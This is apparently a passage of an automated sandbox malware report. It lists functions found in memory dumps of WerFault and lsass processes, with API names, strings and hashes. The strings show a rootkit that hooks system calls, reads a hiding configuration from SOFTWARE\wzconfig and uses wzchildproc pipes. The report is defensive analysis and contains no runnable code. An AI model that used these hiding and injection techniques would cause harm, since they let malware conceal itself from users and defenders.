                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                • Opcode ID: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction ID: dcad42909409d285cffe862b5d4df63eda30ab524c9275e52c4e42825555b531
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C951BE32100AF0C6EB64DFE5954835977A2FB54B8CF188195DA89A7BD9CF3AC560CF00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 756756679-0
                                                                                                                                                                                                                                                • Opcode ID: 787e2ccd3a4a2f0807cc7fcfab9808ef1bc99af934d1353d068844bd3f29b985
                                                                                                                                                                                                                                                • Instruction ID: cb1ab5472dd8b0f5c5fa24d9c03472d00d91ae99d64c63d32ac98184a23b86b4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 787e2ccd3a4a2f0807cc7fcfab9808ef1bc99af934d1353d068844bd3f29b985
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0316231701FB192EA61DF96E948769A7A0FF44BC8F184024DF8957B59EF36C465CB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                                                                                                                                • Opcode ID: ef5328ec8df5305a5bebb05340c2e4b6dc17e77d604934f64985ec379b581ae8
                                                                                                                                                                                                                                                • Instruction ID: 672ed83e570dcb392832020153011d0660b0c04c4a9a4ac5bd7d9e9b6a7bf364
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef5328ec8df5305a5bebb05340c2e4b6dc17e77d604934f64985ec379b581ae8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EDD1EE36B14EA089E721CFA9D4483AC37B1FB44BACF248216CE5DA7B9DDA35C446D740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 953036326-0
                                                                                                                                                                                                                                                • Opcode ID: 43d1806d22cf26bb578584b1f50928cd79f72239213f1d2f409b9d03dcc02cf4
                                                                                                                                                                                                                                                • Instruction ID: 82b8a53827fd129fff10ec915a8dd3a70280cd5c0f23d612c8065f3ccaa5e698
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43d1806d22cf26bb578584b1f50928cd79f72239213f1d2f409b9d03dcc02cf4
• Instruction Fuzzy Hash: 52919E72700E7085FBA1DFA9D8883AD2BA4BB44B8CF344109DE4A77699DB37C442E700

APIs
Memory Dump Source
• Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: c25137996cf865269d3dc01569cfdf526b316795659beb4b1a68d386b57b9efa
• Instruction ID: f73215e7dad455afb231f26c2086af343a6a6e9c7bc1bfba46c417bac58a4cb6
• Opcode Fuzzy Hash: c25137996cf865269d3dc01569cfdf526b316795659beb4b1a68d386b57b9efa
• Instruction Fuzzy Hash: 60113C36710F618AEB40CFA1E8583A833A4FB1975CF541E21DE6D977A8DF79D1A88340

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
• Opcode ID: ee842ef1b9af794ce5f9c57276e32575cf678b56a57e7c1674317c9bf9c17d00
• Instruction ID: 80fd0e0e5efeabf350905499890869361a0a2bc7408110491b8c8e6118925359
• Opcode Fuzzy Hash: ee842ef1b9af794ce5f9c57276e32575cf678b56a57e7c1674317c9bf9c17d00
• Instruction Fuzzy Hash: 86512436208FF081E666DEE9A05C3AE6795FB85788F844065DE4923B9DCB3BC508CF40

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
• Opcode ID: 6a2d2f89dbe45a9fea545bcb4aa06eef1d3c7bdcbbdd9a8edf910a903994b9b4
• Instruction ID: 13e1fa06cd8b34395c7c577ad4a22f781b66b8383201e561f6a86c0ad850ce28
• Opcode Fuzzy Hash: 6a2d2f89dbe45a9fea545bcb4aa06eef1d3c7bdcbbdd9a8edf910a903994b9b4
• Instruction Fuzzy Hash: 6641C476314EA086EB60DF65E8483AA77A0FB98788F504121EE4D9779CEB7DC441DB40

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
• Opcode ID: d7810ab3a0ec9818877cf1b3e283a106e6e962497adc233d094785ed36f44b7e
• Instruction ID: 10a7dd7db16448f407446f6983adb9c4268c20a4eced4795eb3bfa5357d16e64
• Opcode Fuzzy Hash: d7810ab3a0ec9818877cf1b3e283a106e6e962497adc233d094785ed36f44b7e
• Instruction Fuzzy Hash: 44112B32215FA082EB618B15E444359B7E4FB88B98F598260EFCD17B68EF3DC551CB04

APIs
Memory Dump Source
• Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID:
• API String ID: 756756679-0
• Opcode ID: 1e98e18f6346a7606d876eb22bc804523d63b476fed3d5047e07684f33477b56
• Instruction ID: 092e01609e4caf6e613b8fa8b6b67293fe47d5e72895b9d6f37fcb24ee187790
• Opcode Fuzzy Hash: 1e98e18f6346a7606d876eb22bc804523d63b476fed3d5047e07684f33477b56
• Instruction Fuzzy Hash: 0811B235601FA481EA44DBA6E40C22977A0FF88FC8F285068CE4D63769DF3AC452D700

APIs
Memory Dump Source
• Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
• Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
• Instruction ID: 0a849bc9c004dcd1a9c72428d56cbea6717bb06f47582cd4cae041660eb30b01
• Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
• Instruction Fuzzy Hash: 8CE06D75601E2486EB448FA2D80C34A36E1FF89F0AF25C024CD8907355DFBF84AAD750

Execution Graph

Execution Coverage: 0.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 123
Total number of Limit Nodes: 10

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
Similarity
• API ID: FileType
• String ID: \\.\pipe\
                                                                                                                                                                                                                                                • API String ID: 3081899298-91387939
                                                                                                                                                                                                                                                • Opcode ID: 2214ffb8d2229323086ad34a8b531e28ba158b85d1d3dbad5c7c70fb1dba52b7
                                                                                                                                                                                                                                                • Instruction ID: be60497f1b3bb757eb9c40a55f823d933b164f7bed1d5150bfb2534825b154ea
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2214ffb8d2229323086ad34a8b531e28ba158b85d1d3dbad5c7c70fb1dba52b7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F271E836208F8A82EB34DF35BC543EA6BB4FB44794F494016DD4D4378ADEB5C58A8740

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                                                • String ID: S
                                                                                                                                                                                                                                                • API String ID: 756756679-543223747
                                                                                                                                                                                                                                                • Opcode ID: 2c414ab3eb2c8f5067fa8ace7f17c5c48379fbe6073c257fbef930be96b73639
                                                                                                                                                                                                                                                • Instruction ID: e6d9cf65a4925b5213f365f011728b373076181cb707664ce8a93ec19c3e99b5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c414ab3eb2c8f5067fa8ace7f17c5c48379fbe6073c257fbef930be96b73639
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA519E36A15F2886E761CB25F840BEA6BB4FB14784F89C415DF0D52B86DB75C89BC340

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                                                                                                                                                                                • String ID: \\?\
                                                                                                                                                                                                                                                • API String ID: 2719912262-4282027825
                                                                                                                                                                                                                                                • Opcode ID: 5d436592c77a9924c69bcb50891f68179583d79dfa63631e028aef339bed858e
                                                                                                                                                                                                                                                • Instruction ID: eb8ddd73c4e15f21de66f0e3dee770b919fdf917898f85856a439deb2b5aeb72
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d436592c77a9924c69bcb50891f68179583d79dfa63631e028aef339bed858e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27F0A432308B8892E7308F61F4947996770FB54B88F8C4020CA4D42556DF7CC6CACB80

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1683269324-0
                                                                                                                                                                                                                                                • Opcode ID: fd13d599d4a1a9a129cf8228822ebf0962c6205abdf5c3edc3572841aa0737cc
                                                                                                                                                                                                                                                • Instruction ID: bd096dc74ed7da0d1c9fed95bed7b3375edca248b29cd9ab8204d1ef912baf82
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd13d599d4a1a9a129cf8228822ebf0962c6205abdf5c3edc3572841aa0737cc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43118070B1CF8D83F7649B60B8093D966B4AF54745F0C8069A98E851A3EFB8C0C7C280

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: GetProcessHeap.KERNEL32 ref: 0000017D2DD5163B
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: HeapAlloc.KERNEL32 ref: 0000017D2DD5164A
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD516BA
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD516E7
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegCloseKey.ADVAPI32 ref: 0000017D2DD51701
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD51721
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegCloseKey.ADVAPI32 ref: 0000017D2DD5173C
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD5175C
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegCloseKey.ADVAPI32 ref: 0000017D2DD51777
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD51797
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegCloseKey.ADVAPI32 ref: 0000017D2DD517B2
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD517D2
                                                                                                                                                                                                                                                • Sleep.KERNEL32 ref: 0000017D2DD51ADF
                                                                                                                                                                                                                                                • SleepEx.KERNELBASE ref: 0000017D2DD51AE5
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegCloseKey.ADVAPI32 ref: 0000017D2DD517ED
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD5180D
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegCloseKey.ADVAPI32 ref: 0000017D2DD51828
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD51848
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegCloseKey.ADVAPI32 ref: 0000017D2DD51863
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD51883
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegCloseKey.ADVAPI32 ref: 0000017D2DD5189E
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegCloseKey.ADVAPI32 ref: 0000017D2DD518A8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1534210851-0
                                                                                                                                                                                                                                                • Opcode ID: 96bbb6c5dfaa89c5ee4f9b47efdaf229a391d86e69f5c9ec07006103e4739bcd
                                                                                                                                                                                                                                                • Instruction ID: 570d7ab51c8e0b07d291cac90dfff41aaf335325977e64992ebdfe4135924a30
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 96bbb6c5dfaa89c5ee4f9b47efdaf229a391d86e69f5c9ec07006103e4739bcd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB31D675219F0982FF50AB22F9413E933B4AF85BC0F1C58219E0E876D7EEA4D8D38251

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2672695610.0000017D2DD20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd20000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                                                                                                                                • Instruction ID: 39426c26ca32ae400772b24e4e950172d55683279c8d6bef7303a10b684e0d04
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D61F232B09B9487DB548F15A4447ADBBB2FB44BA4F5C8121AE1D0778FDA38D893C710

Control-flow Graph
Control-flow graph for function 17d2dd52b40 (calls GetModuleHandleA, StrCmpNIW and lstrlenW plus the internal routines 17d2dd72d50, 17d2dd66090, 17d2dd519a4, 17d2dd51bc4, 17d2dd53858, 17d2dd51534 and 17d2dd65090; the rendered graph with its Executed / Not Executed colouring was not extracted)
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
Similarity
• API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
• String ID: NtQueryObject$\Device\Nsi$ntdll.dll
• API String ID: 2119608203-3850299575
• Opcode ID: 26544e6c5f0419fcfe813128afc281aff9572a7b63f13a5f121835e5e6e69d00
• Instruction ID: a0a6aa28ae3149062d712f56b3cd3c4fcddfc72a84a4e799f10804a490fe61e5
• Opcode Fuzzy Hash: 26544e6c5f0419fcfe813128afc281aff9572a7b63f13a5f121835e5e6e69d00
• Instruction Fuzzy Hash: EBB1A032219F9882EB588F65E4407E96BB4FF44B84F189016DE0D53B96DBB4CCDAC380
APIs
Memory Dump Source
• Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: 7dccb9baa4819195bc910d82c93c9c94a074eef8dbf9c6936f7d6f4099627f79
• Instruction ID: ea04d6ab5b21933593bc799dab6d6a7fa590fe32e1eb952a32cd0718e30f53ac
• Opcode Fuzzy Hash: 7dccb9baa4819195bc910d82c93c9c94a074eef8dbf9c6936f7d6f4099627f79
• Instruction Fuzzy Hash: 79311A76208F849AEB609F60F8407ED7374FB88744F58402ADA4E47B96EF78C5898750
APIs
Memory Dump Source
• Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: 8ad7b10046b838cd94577b5e5c393489478853aa225d9b7cfe16be4989e4b7af
• Instruction ID: 835dc39f46adda6f5433ca3369647d18550c7ca659d1a6783716b3d5dcb44e9b
• Opcode Fuzzy Hash: 8ad7b10046b838cd94577b5e5c393489478853aa225d9b7cfe16be4989e4b7af
• Instruction Fuzzy Hash: EE312C36218F8496EB608F25F8407DE73B4FB89754F580116EA9D43B9ADF38C596CB40

Control-flow Graph
(rendered graph not extracted)
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
Similarity
• API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
• String ID: SOFTWARE\wzconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
• API String ID: 106492572-440640706
• Opcode ID: 7c4a1d948d205c8ebe001ad381780c1a24ce9ec132a6c0bfe6eb7dfad1714e50
• Instruction ID: 5e63b444e4f81cac1bc996d5a412164adaeb3b3d7e52fbd52ab2f007730aeba3
• Opcode Fuzzy Hash: 7c4a1d948d205c8ebe001ad381780c1a24ce9ec132a6c0bfe6eb7dfad1714e50
• Instruction Fuzzy Hash: 57710B3A318F5985EB209F66F8506D93374FF95B88F481121DA4E47B6ADF74C486C780

Control-flow Graph
(rendered graph not extracted)
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
Similarity
• API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
• String ID: d
• API String ID: 2005889112-2564639436
• Opcode ID: 8c63c14dadc595c9770824a5a8628493091718220e8d249dbd43905e110b320b
• Instruction ID: 33ae801fa1b3165cb9d5bb43ea7dda0d2e83df6727d4b75619c767e92f57e636
• Opcode Fuzzy Hash: 8c63c14dadc595c9770824a5a8628493091718220e8d249dbd43905e110b320b
• Instruction Fuzzy Hash: FD513B36208F8886EB54CF62F54839AB7B5FB89B99F084124DA494775ADF7CC086C780

Control-flow Graph
(rendered graph not extracted)
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
Similarity
• API ID: CurrentThread$AddressHandleModuleProc
• String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
• API String ID: 4175298099-1975688563
• Opcode ID: f9a2c3f0e0819997d594a213550735c5682f77fff7d415db42708e4ed7ca13a2
• Instruction ID: b99ff1446e92c8109a6055d4f7fc4468c0205d9dd8ae17204e4a0a833e0fa6a2
• Opcode Fuzzy Hash: f9a2c3f0e0819997d594a213550735c5682f77fff7d415db42708e4ed7ca13a2
• Instruction Fuzzy Hash: 53314DB9209F8EA4FA05EB6AF8517D46731AF44398F8C8457940D061679FB892CFC3D0

Control-flow Graph

APIs
• GetLastError.KERNEL32 ref: 0000017D2DD5D3A7
• FlsGetValue.KERNEL32(?,?,?,0000017D2DD60FDB,?,?,?,0000017D2DD609CC,?,?,?,0000017D2DD5CDBF), ref: 0000017D2DD5D3BC
• FlsSetValue.KERNEL32(?,?,?,0000017D2DD60FDB,?,?,?,0000017D2DD609CC,?,?,?,0000017D2DD5CDBF), ref: 0000017D2DD5D3DD
• FlsSetValue.KERNEL32(?,?,?,0000017D2DD60FDB,?,?,?,0000017D2DD609CC,?,?,?,0000017D2DD5CDBF), ref: 0000017D2DD5D40A
• FlsSetValue.KERNEL32(?,?,?,0000017D2DD60FDB,?,?,?,0000017D2DD609CC,?,?,?,0000017D2DD5CDBF), ref: 0000017D2DD5D41B
• FlsSetValue.KERNEL32(?,?,?,0000017D2DD60FDB,?,?,?,0000017D2DD609CC,?,?,?,0000017D2DD5CDBF), ref: 0000017D2DD5D42C
• SetLastError.KERNEL32 ref: 0000017D2DD5D447
• FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000017D2DD60FDB,?,?,?,0000017D2DD609CC,?,?,?,0000017D2DD5CDBF), ref: 0000017D2DD5D47D
• FlsSetValue.KERNEL32(?,?,00000001,0000017D2DD5F23C,?,?,?,?,0000017D2DD5C50F,?,?,?,?,?,0000017D2DD57AC0), ref: 0000017D2DD5D49C
  • Part of subcall function 0000017D2DD5DC3C: HeapAlloc.KERNEL32 ref: 0000017D2DD5DC91
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000017D2DD60FDB,?,?,?,0000017D2DD609CC,?,?,?,0000017D2DD5CDBF), ref: 0000017D2DD5D4C4
  • Part of subcall function 0000017D2DD5DCB4: HeapFree.KERNEL32 ref: 0000017D2DD5DCCA
  • Part of subcall function 0000017D2DD5DCB4: GetLastError.KERNEL32 ref: 0000017D2DD5DCD4
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000017D2DD60FDB,?,?,?,0000017D2DD609CC,?,?,?,0000017D2DD5CDBF), ref: 0000017D2DD5D4D5
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000017D2DD60FDB,?,?,?,0000017D2DD609CC,?,?,?,0000017D2DD5CDBF), ref: 0000017D2DD5D4E6
Memory Dump Source
• Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
Similarity
• API ID: Value$ErrorLast$Heap$AllocFree
• String ID:
• API String ID: 570795689-0
• Opcode ID: 0311236df13cff9ddc5faef47bd35e239f24ae7eb6a96a8c603fa91771617960
• Instruction ID: f342d48d64a70e30c132d12ea025a39a7379fc3ada3b3726e1369fe98b1ce1df
• Opcode Fuzzy Hash: 0311236df13cff9ddc5faef47bd35e239f24ae7eb6a96a8c603fa91771617960
• Instruction Fuzzy Hash: 49413E3020DF4C82FE58A73579513F92276AF457B4F5C0724E97E4A6DBDEA8A4C34221

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
Similarity
• API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
• String ID: \\.\pipe\wzchildproc32$\\.\pipe\wzchildproc64
• API String ID: 2171963597-1908187885
• Opcode ID: 61e9aad5965f0bf4cc9e1225d6c883f067986cfc1e7eceaf874e8f6c664e297a
• Instruction ID: 25127506bbc582b8b19cf647224e3e32b237d016ff1f39aa22e8fa49ee2c4d4f
• Opcode Fuzzy Hash: 61e9aad5965f0bf4cc9e1225d6c883f067986cfc1e7eceaf874e8f6c664e297a
